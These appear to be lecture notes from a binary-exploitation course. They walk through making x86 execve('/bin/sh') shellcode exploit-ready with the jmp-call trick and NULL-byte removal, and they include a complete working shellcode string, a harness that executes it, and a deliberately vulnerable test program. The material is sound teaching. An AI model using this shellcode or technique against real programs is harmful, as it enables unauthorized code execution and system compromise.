Lec. 10: Making Shell Code Exploit Ready
1 Review: x86 Shell Code
Recall that we can write a bit of shell code like so:
    ;; execve.asm - execute "/bin/sh" and exit if you fail

    SECTION .data                   ; Data section
    shell:  db "/bin/sh",0          ; The program we want to run - "/bin/sh"

    SECTION .text                   ; Code section
            global _start           ; Make label available to linker
    _start:                         ; Standard ld entry point
            push 0                  ; args[1] - NULL
            push shell              ; args[0] - "/bin/sh"
            mov edx,0               ; Param #3 - NULL
            mov ecx,esp             ; Param #2 - address of args array
            mov ebx,shell           ; Param #1 - "/bin/sh"
            mov eax,0xb             ; System call number for execve
            int 0x80                ; Interrupt 80 hex - invoke system call

            mov ebx,0               ; Exit code, 0 = normal
            mov eax,1               ; System call number for exit
            int 0x80                ; Interrupt 80 hex - invoke system call
This program will execute a shell, and we can see that by assembling and linking the program using nasm and ld:
    user@si485H-base:demo$ nasm -f elf execve_fixedref.asm -o execve_fixedref.o; ld execve_fixedref.o -o execve_fixedref
    user@si485H-base:demo$ ./execve_fixedref
    $ echo "SHELL"
    SHELL
    $
However, this shell code is not ready for prime time. There are a few things we need to fix. First, we need to look at the shell code as the raw bytes of its instructions. Later, we'll need to both fix the references and remove the NULL bytes.
2 Shell code as bytes
The next thing we want to do is represent the program we wrote in raw bytes. To do that, let's look at the objdump output:
    user@si485H-base:demo$ objdump -d -M intel execve_fixedref

    execve:     file format elf32-i386


    Disassembly of section .text:

    08048080 <_start>:
     8048080:       6a 00                   push   0x0
     8048082:       68 a8 90 04 08          push   0x80490a8
     8048087:       ba 00 00 00 00          mov    edx,0x0
     804808c:       89 e1                   mov    ecx,esp
     804808e:       bb a8 90 04 08          mov    ebx,0x80490a8
     8048093:       b8 0b 00 00 00          mov    eax,0xb
     8048098:       cd 80                   int    0x80
     804809a:       bb 00 00 00 00          mov    ebx,0x0
     804809f:       b8 01 00 00 00          mov    eax,0x1
     80480a4:       cd 80                   int    0x80
The byte values for the instructions are clearly listed, and we can extract them with a nifty little script I wrote called hexify.sh (a shell pipeline with a Python one-liner at the end):
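    # Pull the byte column out of the objdump listing, one byte per line
    bytes=$(objdump -d "$1" | grep 804 | grep -v ">:" | cut -f 2 | tr " " "\n" | tr -s "\n" )
    # Prefix every byte with \x; print(...) works under both Python 2 and 3
    hex=$(echo $bytes | python -c "import sys; print(''.join(r'\x%s'%c for c in sys.stdin.read().split()))")
    echo "$hex"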
Running this on the program, we get the following hex escaped string:
    user@si485H-base:demo$ ./hexify.sh execve_fixedref
    \x6a\x00\x68\xa8\x90\x04\x08\xba\x00\x00\x00\x00\x89\xe1\xbb\xa8\x90\x04\x08\xb8\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80
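The formatting step of hexify can also be sketched in plain Python 3. This is only an illustration of the byte-to-escape conversion, not a replacement for the script: the function name `hexify` and the `sample` bytes (the first two instructions of the listing above) are chosen here for the example.

```python
def hexify(data: bytes) -> str:
    """Return data as a string of \\xNN escapes, one escape per byte."""
    return "".join("\\x%02x" % b for b in data)


# First two instructions from the objdump listing:
#   6a 00            push 0x0
#   68 a8 90 04 08   push 0x80490a8
sample = bytes.fromhex("6a 00 68 a8 90 04 08")

print(hexify(sample))
```

Unlike the shell pipeline, this version takes the bytes directly, so it does not depend on how objdump lays out its columns.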
3 Fixed references suck
The raw bytes we have above are almost shell code, but not quite. To test them out, we can try to execute them from some C code by casting the byte string to a function pointer.
    int main(){

      char * code = "\x6a\x00\x68\xa8\x90\x04\x08\xba\x00\x00"
                    "\x00\x00\x89\xe1\xbb\xa8\x90\x04\x08\xb8"
                    "\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00"
                    "\x00\xb8\x01\x00\x00\x00\xcd\x80";

      //cast pointer to function pointer and call
      ((void(*)(void)) code)();

    }
If we then go ahead and try and execute this program, it doesn't work as expected (or at all). To see why, we need to open it up in gdb:
    (gdb) ds main
    Dump of assembler code for function main:
       0x080483ed <+0>:     push   ebp
       0x080483ee <+1>:     mov    ebp,esp
       0x080483f0 <+3>:     and    esp,0xfffffff0
       0x080483f3 <+6>:     sub    esp,0x10
       0x080483f6 <+9>:     mov    DWORD PTR [esp+0xc],0x80484a0
       0x080483fe <+17>:    mov    eax,DWORD PTR [esp+0xc]
       0x08048402 <+21>:    call   eax
       0x08048404 <+23>:    leave
       0x08048405 <+24>:    ret
    End of assembler dump.
    (gdb) x/10i 0x80484a0
       0x80484a0:   push   0x0
       0x80484a2:   push   0x80490a8
       0x80484a7:   mov    edx,0x0
       0x80484ac:   mov    ecx,esp
       0x80484ae:   mov    ebx,0x80490a8
       0x80484b3:   mov    eax,0xb
       0x80484b8:   int    0x80
       0x80484ba:   mov    ebx,0x0
       0x80484bf:   mov    eax,0x1
       0x80484c4:   int    0x80
First we see that main calls address 0x80484a0, and if we examine that address, we find our shell code. But there is a problem. We push the address 0x80490a8 onto the stack, which should be our "/bin/sh" string, but that reference is broken: the address pointed into the data section of the original executable, and nothing is mapped there in this program.
    (gdb) x/s 0x80490a8
    0x80490a8:      <error: Cannot access memory at address 0x80490a8>
Our shell code doesn't work because it contains fixed references. Instead, we need the code to work out the address of its own data at run time.
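To see that the fixed address really is baked into the bytes, we can decode the operand of the push instruction from the objdump listing. This is a small sketch: the variable names are made up for the example, and it assumes the instruction is the 5-byte form shown in the listing (opcode 0x68 followed by a 32-bit little-endian operand).

```python
import struct

# Bytes of "push 0x80490a8" from the objdump listing:
# opcode 0x68 followed by a 4-byte operand.
push_insn = bytes.fromhex("68 a8 90 04 08")

opcode = push_insn[0]
# x86 stores multi-byte values little-endian, so a8 90 04 08 is 0x080490a8.
(address,) = struct.unpack("<I", push_insn[1:5])

print(hex(opcode), hex(address))
```

The decoded operand is the same absolute address that gdb could not read, which is why copying these bytes into another program breaks the reference.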
4 Jmp-Callback
To remove fixed references, we need to use instructions that will calculate a reference for us. There are a few ways to do this, but we will use the standard Jmp-Callback trick. Consider the revised code below:
    SECTION .text                   ; Code section
            global _start           ; Make label available to linker
    _start:                         ; Standard ld entry point
            jmp callback

    dowork:
            pop esi                 ; esi now holds address of "/bin/sh"
            push 0                  ; args[1] - NULL
            push esi                ; args[0] - "/bin/sh"
            mov edx,0               ; Param #3 - NULL
            mov ecx,esp             ; Param #2 - address of args array
            mov ebx,esi             ; Param #1 - "/bin/sh"
            mov eax,0xb             ; System call number for execve
            int 0x80                ; Interrupt 80 hex - invoke system call

            mov ebx,0               ; Exit code, 0 = normal
            mov eax,1               ; System call number for exit
            int 0x80                ; Interrupt 80 hex - invoke system call

    callback:
            call dowork             ; call pushes the next address onto stack,
                                    ; which is address of "/bin/sh"
            db "/bin/sh",0          ;
The first thing that happens in _start is that we jump to the callback label, which in turn calls dowork. That might seem like a lot of indirection, but from that indirection we gain the reference to the string "/bin/sh".
Why? A call instruction not only jumps to the reference indicated, but it also pushes the return address onto the stack. The return address is the address of whatever follows the call, which in the case above is the address of the db data for "/bin/sh" … exactly what we need. At dowork we can pop the return address off the stack, i.e., the address of the string "/bin/sh", and use that address. In particular, we save that address in the esi register.
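The offset arithmetic behind the trick can be checked by hand. The sketch below decodes the jmp and call in the assembled bytes of the listing above (the same 46 bytes its hexify output gives) and works out where each one lands. All offsets are relative to the start of the shell code, and the variable names are chosen here for illustration.

```python
import struct

# Assembled bytes of the jmp-call listing, grouped one instruction per string.
code = bytes.fromhex(
    "eb20" "5e" "6a00" "56" "ba00000000" "89e1" "89f3" "b80b000000" "cd80"
    "bb00000000" "b801000000" "cd80" "e8dbffffff" "2f62696e2f7368"
)

# jmp rel8 (eb XX) is 2 bytes long: target = next instruction + signed offset.
jmp_target = 2 + struct.unpack("b", code[1:2])[0]

# The call (e8 + rel32, 5 bytes long) sits at jmp_target.
(rel32,) = struct.unpack("<i", code[jmp_target + 1 : jmp_target + 5])
return_addr = jmp_target + 5       # what call pushes onto the stack
call_target = return_addr + rel32  # where call transfers control (dowork)

print(hex(jmp_target), hex(return_addr), hex(call_target))
print(code[return_addr:])          # the bytes the popped address points at
```

Both jmp and call encode their targets relative to the current instruction, so none of these numbers change when the bytes are loaded at a different address.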
Now, we can hexify and insert that code into C and see if that works:
    int main(){

      char * code = "\xeb\x20\x5e\x6a\x00\x56\xba\x00\x00\x00"
                    "\x00\x89\xe1\x89\xf3\xb8\x0b\x00\x00\x00"
                    "\xcd\x80\xbb\x00\x00\x00\x00\xb8\x01\x00"
                    "\x00\x00\xcd\x80\xe8\xdb\xff\xff\xff\x2f"
                    "\x62\x69\x6e\x2f\x73\x68";

      //cast pointer to function pointer and call
      ((void(*)(void)) code)();

    }
    user@si485H-base:demo$ gcc execve_jmpcall.c -o execve_jmpcall
    user@si485H-base:demo$ ./execve_jmpcall
    $
And now we are in business … sort of.
5 Null Bytes are the ENEMY
The next challenge is using our shell code through an exploit. We won't do that exactly, but we can simulate what that might be like with this simple program:
    #include <string.h>

    int main(int argc, char *argv[]){

      char code[1024];

      strncpy(code,argv[1],1024);

      //cast pointer to function pointer and call
      ((void(*)(void)) code)();

    }
The program simply reads a command-line argument, copies it into a buffer, and then executes the buffer. This is essentially what we want to happen when we exploit a program, except that here a lot of the work is done for us.
What we'd like to happen is that we can do this with our shell code hex:
    user@si485H-base:demo$ ./hexify.sh execve_jmpcall
    \xeb\x20\x5e\x6a\x00\x56\xba\x00\x00\x00\x00\x89\xe1\x89\xf3\xb8\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
    user@si485H-base:demo$ ./dummy_exploit $(printf "\xeb\x20\x5e\x6a\x00\x56\xba\x00\x00\x00\x00\x89\xe1\x89\xf3\xb8\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68")
    Segmentation fault (core dumped)
We have a problem. Let's execute this under gdb, and we can see where the problem arises:
    (gdb) ds main
    Dump of assembler code for function main:
       0x0804841d <+0>:     push   ebp
       0x0804841e <+1>:     mov    ebp,esp
       0x08048420 <+3>:     and    esp,0xfffffff0
       0x08048423 <+6>:     sub    esp,0x410
       0x08048429 <+12>:    mov    eax,DWORD PTR [ebp+0xc]
       0x0804842c <+15>:    add    eax,0x4
       0x0804842f <+18>:    mov    eax,DWORD PTR [eax]
       0x08048431 <+20>:    mov    DWORD PTR [esp+0x8],0x400
       0x08048439 <+28>:    mov    DWORD PTR [esp+0x4],eax
       0x0804843d <+32>:    lea    eax,[esp+0x10]
       0x08048441 <+36>:    mov    DWORD PTR [esp],eax
       0x08048444 <+39>:    call   0x8048310 <strncpy@plt>
       0x08048449 <+44>:    lea    eax,[esp+0x10]
       0x0804844d <+48>:    call   eax
       0x0804844f <+50>:    leave
       0x08048450 <+51>:    ret
    End of assembler dump.
    (gdb) br *0x0804844d
    Breakpoint 1 at 0x804844d
    (gdb) r $(printf "\xeb\x20\x5e\x6a\x00\x56\xba\x00\x00\x00\x00\x89\xe1\x89\xf3\xb8\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68")
    Starting program: /home/user/git/si485-binary-exploits/lec/09/demo/dummy_exploit $(printf "\xeb\x20\x5e\x6a\x00\x56\xba\x00\x00\x00\x00\x89\xe1\x89\xf3\xb8\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68")

    Breakpoint 1, 0x0804844d in main ()
    (gdb) x/10i $esp+0x10
       0xbffff250:  jmp    0xbffff252
       0xbffff252:  add    BYTE PTR [eax],al
       0xbffff254:  add    BYTE PTR [eax],al
       0xbffff256:  add    BYTE PTR [eax],al
       0xbffff258:  add    BYTE PTR [eax],al
       0xbffff25a:  add    BYTE PTR [eax],al
       0xbffff25c:  add    BYTE PTR [eax],al
       0xbffff25e:  add    BYTE PTR [eax],al
       0xbffff260:  add    BYTE PTR [eax],al
       0xbffff262:  add    BYTE PTR [eax],al
In the above gdb execution, we first set a breakpoint right before the call so that we can inspect the address that will be called, $esp+0x10. Unfortunately, if we look closely, we see that the jmp, our first instruction, is there, but then we are in trouble: everything after it is a run of nonsense instructions (add BYTE PTR [eax],al is how a pair of zero bytes disassembles).
What happened? Let's look more closely at our command line argument:
$(printf "\xeb\x20\x5e\x6a\x00\x56\xba\x00\x00\x00\x00\x89\xe1\x89\xf3\xb8\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68")
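You see that 5 bytes in, there is a NULL (\x00). strncpy() stops copying at the first NULL and fills the rest of the buffer with zeros, so nothing after that byte can reach the buffer. (In this particular run even less arrived: the jmp offset in the dump is zero because \x20 is a space, and the shell splits the unquoted $(printf ...) output there.)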
We need to remove NULL bytes!
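To make the truncation concrete, here is a rough Python model of what strncpy() does with our bytes. It models only the C library call, not the shell that builds the argument, and `strncpy_model` is a name invented for this sketch.

```python
def strncpy_model(src: bytes, n: int) -> bytes:
    """Model C strncpy: copy up to the first NUL (at most n bytes),
    then zero-fill the remainder of the n-byte destination."""
    end = src.find(b"\x00")
    if end == -1:
        end = len(src)
    copied = src[: min(end, n)]
    return copied + b"\x00" * (n - len(copied))


# The jmp-call shell code from the command line above.
code = bytes.fromhex(
    "eb20" "5e" "6a00" "56" "ba00000000" "89e1" "89f3" "b80b000000" "cd80"
    "bb00000000" "b801000000" "cd80" "e8dbffffff" "2f62696e2f7368"
)

buf = strncpy_model(code, 1024)
survived = buf.rstrip(b"\x00")  # whatever made it into the buffer
print(survived.hex(), len(survived), "of", len(code), "bytes")
```

Only the bytes in front of the first NULL are copied; the remaining 42 bytes of shell code never make it into the buffer.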
6 Removing NULL bytes
To remove NULL bytes, we need to get creative. Let's look at the objdump of our previous version of the shell code to get a sense of where we are at.
    user@si485H-base:demo$ objdump -d -M intel execve_calljmp

    execve_calljmp:     file format elf32-i386


    Disassembly of section .text:

    08048060 <_start>:
     8048060:       eb 20                   jmp    8048082 <callback>

    08048062 <dowork>:
     8048062:       5e                      pop    esi
     8048063:       6a 00                   push   0x0
     8048065:       56                      push   esi
     8048066:       ba 00 00 00 00          mov    edx,0x0
     804806b:       89 e1                   mov    ecx,esp
     804806d:       89 f3                   mov    ebx,esi
     804806f:       b8 0b 00 00 00          mov    eax,0xb
     8048074:       cd 80                   int    0x80
     8048076:       bb 00 00 00 00          mov    ebx,0x0
     804807b:       b8 01 00 00 00          mov    eax,0x1
     8048080:       cd 80                   int    0x80

    08048082 <callback>:
     8048082:       e8 db ff ff ff          call   8048062 <dowork>
     8048087:       2f                      das
     8048088:       62 69 6e                bound  ebp,QWORD PTR [ecx+0x6e]
     804808b:       2f                      das
     804808c:       73 68                   jae    80480f6 <callback+0x74>
You can see where the NULLs come from. There are two big problems:
- push 0x0: pushing a NULL onto the stack requires a null byte in the instruction itself (6a 00)
- mov e*x,<small value>: moving a 1-byte value (or zero) into a 4-byte register pads the immediate out to 4 bytes with null bytes (e.g., b8 0b 00 00 00)
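To solve the first problem, we need to create NULL bytes without actually writing any NULL bytes. The most effective way to do this is with xor. Recall that the xor of a value with itself is always zero, so xor eax,eax zeroes eax without a single zero byte in its encoding. To solve the second problem, we load small constants into the 8-bit registers al, bl, cl, and dl instead of the full 32-bit registers, so the immediate is a single byte. A write to al leaves the upper three bytes of eax untouched, so eax must already be zero when we do this. We can write our code like so.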
    SECTION .text                   ; Code section
            global _start           ; Make label available to linker
    _start:                         ; Standard ld entry point
            jmp callback

    dowork:
            pop esi                 ; esi now holds address of "/bin/sh"
            xor eax,eax             ; zero out eax
            push eax                ; args[1] - NULL
            push esi                ; args[0] - "/bin/sh"
            xor edx,edx             ; Param #3 - NULL (zero out edx)
            mov ecx,esp             ; Param #2 - address of args array
            mov ebx,esi             ; Param #1 - "/bin/sh"
            mov al,0xb              ; System call number for execve (use al mov)
            int 0x80                ; Interrupt 80 hex - invoke system call

            xor ebx,ebx             ; Exit code, 0 = normal
            xor eax,eax             ; zero eax
            mov al,1                ; System call number for exit
            int 0x80                ; Interrupt 80 hex - invoke system call

    callback:
            call dowork             ; call pushes the next address onto stack,
                                    ; which is address of "/bin/sh"
            db "/bin/sh",0          ;
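The listing zeroes eax before each mov al because a write to al only replaces the low byte of the register. A quick Python model shows the difference. It treats a register as a plain 32-bit integer, and the helper names and the stale value 0xDEADBEEF are made up for this sketch.

```python
MASK32 = 0xFFFFFFFF


def mov_al(eax: int, imm8: int) -> int:
    """Model `mov al, imm8`: replace only the low 8 bits of eax."""
    return (eax & 0xFFFFFF00) | (imm8 & 0xFF)


def xor_self(reg: int) -> int:
    """Model `xor reg, reg`: any value XORed with itself is zero."""
    return (reg ^ reg) & MASK32


stale = 0xDEADBEEF  # hypothetical leftover value in eax

print(hex(mov_al(stale, 0x0B)))            # upper bytes survive: not 0xb
print(hex(mov_al(xor_self(stale), 0x0B)))  # zero first, then al: exactly 0xb
```

The same reasoning explains the second xor eax,eax before the exit call: if execve fails, the kernel returns an error code in eax, so the register can no longer be assumed to be zero.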
And if we now look at the objdump, there is not a NULL to be found:
    user@si485H-base:demo$ objdump -d -M intel execve_nonull

    execve_nonull:     file format elf32-i386


    Disassembly of section .text:

    08048060 <_start>:
     8048060:       eb 17                   jmp    8048079 <callback>

    08048062 <dowork>:
     8048062:       5e                      pop    esi
     8048063:       31 c0                   xor    eax,eax
     8048065:       50                      push   eax
     8048066:       56                      push   esi
     8048067:       31 d2                   xor    edx,edx
     8048069:       89 e1                   mov    ecx,esp
     804806b:       89 f3                   mov    ebx,esi
     804806d:       b0 0b                   mov    al,0xb
     804806f:       cd 80                   int    0x80
     8048071:       31 db                   xor    ebx,ebx
     8048073:       31 c0                   xor    eax,eax
     8048075:       b0 01                   mov    al,0x1
     8048077:       cd 80                   int    0x80

    08048079 <callback>:
     8048079:       e8 e4 ff ff ff          call   8048062 <dowork>
     804807e:       2f                      das
     804807f:       62 69 6e                bound  ebp,QWORD PTR [ecx+0x6e]
     8048082:       2f                      das
     8048083:       73 68                   jae    80480ed <callback+0x74>
            ...
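Rather than eyeballing the listing, we can scan the bytes. The sketch below compares the jmp-call version with the null-free version. The helper `find_bad_bytes` and its `bad` parameter are inventions for this example, and the byte strings are the hexify outputs of the two programs.

```python
def find_bad_bytes(code: bytes, bad: bytes = b"\x00") -> list:
    """Return the offsets of every byte in code that appears in bad."""
    return [i for i, b in enumerate(code) if b in bad]


# jmp-call version (still contains NULLs)
old = bytes.fromhex(
    "eb20" "5e" "6a00" "56" "ba00000000" "89e1" "89f3" "b80b000000" "cd80"
    "bb00000000" "b801000000" "cd80" "e8dbffffff" "2f62696e2f7368"
)

# xor / al version
new = bytes.fromhex(
    "eb17" "5e" "31c0" "50" "56" "31d2" "89e1" "89f3" "b00b" "cd80"
    "31db" "31c0" "b001" "cd80" "e8e4ffffff" "2f62696e2f7368"
)

print(len(find_bad_bytes(old)), "NULLs in", len(old), "bytes")
print(len(find_bad_bytes(new)), "NULLs in", len(new), "bytes")
```

The rewrite is also shorter, since each xor or mov al takes 2 bytes where the mov it replaces took 5. Other delivery paths can forbid other bytes as well (whitespace, for example), in which case they can be passed in through `bad`.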
Finally, we can use our shell code in the dummy exploit with success:
    user@si485H-base:demo$ ./hexify.sh execve_nonull
    \xeb\x17\x5e\x31\xc0\x50\x56\x31\xd2\x89\xe1\x89\xf3\xb0\x0b\xcd\x80\x31\xdb\x31\xc0\xb0\x01\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
    user@si485H-base:demo$ ./dummy_exploit $(printf "\xeb\x17\x5e\x31\xc0\x50\x56\x31\xd2\x89\xe1\x89\xf3\xb0\x0b\xcd\x80\x31\xdb\x31\xc0\xb0\x01\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68")
    $